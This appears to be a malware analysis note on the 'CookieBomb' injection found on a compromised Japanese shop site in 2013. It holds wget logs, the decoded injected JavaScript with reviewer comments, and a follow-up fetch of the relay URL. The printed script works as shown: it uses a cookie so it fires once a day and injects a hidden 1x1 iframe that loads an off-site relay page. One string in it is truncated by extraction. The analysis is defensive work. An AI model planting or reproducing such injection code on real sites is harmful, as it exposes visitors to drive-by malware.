// Access log of a site infected with the CookieBomb injection...
// --2013-07-15 16:57:36-- hxxp://www.antjapan.co.jp/catalog/
// Resolving www.antjapan.co.jp... 211.10.17.56
// Caching www.antjapan.co.jp => 211.10.17.56
// Connecting to www.antjapan.co.jp|211.10.17.56|:80... connected.
// : GET /catalog/ HTTP/1.1
// Host: www.antjapan.co.jp
// HTTP request sent, awaiting response...
// : HTTP/1.1 200 OK
// Date: Mon, 15 Jul 2013 07:55:25 GMT
// Server: Apache/1.3.37 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.4.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
// X-Powered-By: PHP/4.4.4
// Set-Cookie: osCsid=e1c9ded7019391417e944b64b8cbf1a4; path=/catalog
// Expires: Thu, 19 Nov 1981 08:52:00 GMT
// Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
// Pragma: no-cache
// Keep-Alive: timeout=10, max=128
// Connection: Keep-Alive
// Transfer-Encoding: chunked
// Content-Type: text/html; charset=EUC-JP
// 200 OK
// : Length: unspecified [text/html]
// Saving to: ‘index.html’
// 2013-07-15 16:57:36 (200 KB/s) - ‘index.html’ saved [4959]
//
// NOTE(review): the Server/X-Powered-By banners above advertise Apache 1.3.37,
// PHP 4.4.4 and OpenSSL 0.9.7a, i.e. a very old, long-unsupported stack; the
// osCsid cookie name looks like an osCommerce session id (verify against the
// application). Both are worth recording alongside the injection as context
// for how the site was likely compromised, but the log itself does not show
// the entry vector.
//
// Found the オOCJP-112 malware infection code in index.html (label as printed
// in the source; possibly garbled by extraction).
// After decoding...

// Injects a hidden 1x1 pixel iframe that loads the attacker's relay script.
// Detection notes: the iframe is absolutely positioned at (1px,1px) with a
// 1px width/height and no border, and its src is an off-site relay.php
// (URL defanged as hxxp:// in this paste). The iframe is parented to an
// element with id "h", which is written into the document if it does not
// already exist.
function zzzfff(){
  var h = document.createElement('iframe');
  h.src = 'hxxp://www.verdaedevelopment.com/_js/relay.php';
  h.style.position = 'absolute';
  h.style.border = '0';
  h.style.height = '1px';
  h.style.width = '1px';
  h.style.left = '1px';
  h.style.top = '1px';
  if (!document.getElementById('h')){
    // NOTE(review): the document.write() argument appears truncated by the
    // page extraction (only a line break survives). The very next statement
    // looks up id "h", so it presumably wrote a container element with that
    // id — confirm against the original captured sample.
    document.write('
');
    document.getElementById('h').appendChild(h);
  }
}

// Writes a cookie `cookieName=<escaped cookieValue>` with an expiry of nDays
// days from now and an optional path.
//   cookieName  - cookie name (written unescaped)
//   cookieValue - cookie value, passed through the legacy escape() function
//   nDays       - lifetime in days; null or 0 is treated as 1 (loose ==)
//   path        - optional cookie path; omitted when falsy
// The caller below passes nDays as the string '1'; the multiplication
// coerces it to a number.
function SetCookie(cookieName, cookieValue, nDays, path){
  var today = new Date();
  var expire = new Date();
  if (nDays == null || nDays == 0)nDays = 1;
  // 3600000 ms * 24 = one day.
  expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

// Reads the value of cookie `name` from document.cookie, or returns null if
// it is not present. The value is passed through the legacy unescape().
// Note: the first guard (`!start` with a prefix mismatch) can only trigger
// when start is 0, but indexOf(name + "=") === 0 already implies that the
// cookie string starts with `name`, so that branch is effectively dead; the
// `start == -1` check is what actually handles a missing cookie.
function GetCookie(name){
  var start = document.cookie.indexOf(name + "=");
  var len = start + name.length + 1;
  if ((!start) && (name != document.cookie.substring(0, name.length))){
    return null;
  }
  if (start == - 1)return null;
  var end = document.cookie.indexOf(";", len);
  if (end == - 1)end = document.cookie.length;
  return unescape(document.cookie.substring(len, end));
}

// Entry point of the injection. If cookies are enabled and the marker cookie
// visited_uq is not already 55 (loose ==, so the stored string '55' matches),
// it sets visited_uq=55 for one day on path "/" and injects the iframe.
// Analysis note: because of this marker cookie, a browser (or crawler) that
// keeps cookies will only be served the iframe once per day; a fresh
// cookie-less fetch, as in the wget log above, always triggers it.
if (navigator.cookieEnabled){
  if (GetCookie('visited_uq') == 55){
  } else {
    SetCookie('visited_uq', '55', '1', '/');
    zzzfff();
  }
}

// Following the malware link....
// --2013-07-15 17:06:16-- hxxp://www.verdaedevelopment.com/_js/relay.php
// Resolving www.verdaedevelopment.com... 174.120.172.123
// Caching www.verdaedevelopment.com => 174.120.172.123
// Connecting to www.verdaedevelopment.com|174.120.172.123|:80... connected.
// : GET /_js/relay.php HTTP/1.1
// Referer: http://www.antjapan.co.jp/catalog/
// Host: www.verdaedevelopment.com
// HTTP request sent, awaiting response...
// : HTTP/1.1 200 OK
// Date: Mon, 15 Jul 2013 08:04:06 GMT
// Server: Apache
// Keep-Alive: timeout=5, max=75
// Connection: Keep-Alive
// Transfer-Encoding: chunked
// Content-Type: text/html
// 200 OK
// Length: unspecified [text/html]
// Saving to: ‘relay.php’
// 2013-07-15 17:06:17 (20.8 KB/s) - ‘relay.php’ saved [2]
//
// "relay.php" is a malware relay (forwarding) script; when the conditions
// or timing do not match, it returns a response such as "ok".
// NOTE(review): the 2-byte "ok" body here means this fetch did not receive
// the real payload, so the captured sample is incomplete; which request
// attributes the relay keys on (the page only says "conditions/timing") is
// not shown in this log.
// $ cat relay.php
// ok